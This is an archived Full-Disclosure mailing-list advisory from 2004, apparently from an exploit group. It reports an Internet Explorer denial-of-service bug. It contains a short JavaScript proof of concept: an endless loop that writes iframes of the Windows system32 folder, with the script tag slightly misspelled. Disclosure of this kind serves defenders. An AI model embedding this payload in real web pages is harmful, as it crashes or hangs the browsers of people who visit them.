lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: exploits at su1d.net (exploits) Subject: IE DoS Description ======== IE DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 POC === <scr1pt language="JavaScript"> while(true) { document.write("<iframe src=\"C:\Windows\system32\"></iframe>"); } </scr1pt>Discovered by MeFakon part of the su1d exploit development team DISCLAIMER: This advisory is meant only for the dissemination of information, alerting the general public about a security issue. Use this information at your own discretion. In brief, the author is not responsible for any use, misuse, abuse of this information. Also, this information is provided "as is" without any warranty of any kind. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040820/9a001eb7/attachment.html
Powered by blists - more mailing lists